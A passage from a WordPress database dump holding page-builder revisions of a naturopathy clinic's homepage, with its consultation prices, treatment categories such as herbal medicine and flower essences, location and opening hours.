inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 12:04:21','2021-05-27 04:04:21','',28,'https://verdenaturopathy.com.au/?p=207',0,'revision','',0),(204,1,'2021-05-27 10:35:14','2021-05-27 02:35:14','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" hover_enabled=\"0\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01-large.png\" title_text=\"1-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">Choose from face-to-face or Zoom consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"5-01\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"3-01\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"1-01\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"4-01\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 10:35:14','2021-05-27 02:35:14','',28,'https://verdenaturopathy.com.au/?p=204',0,'revision','',0),(208,1,'2021-05-27 13:06:47','2021-05-27 05:06:47','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair 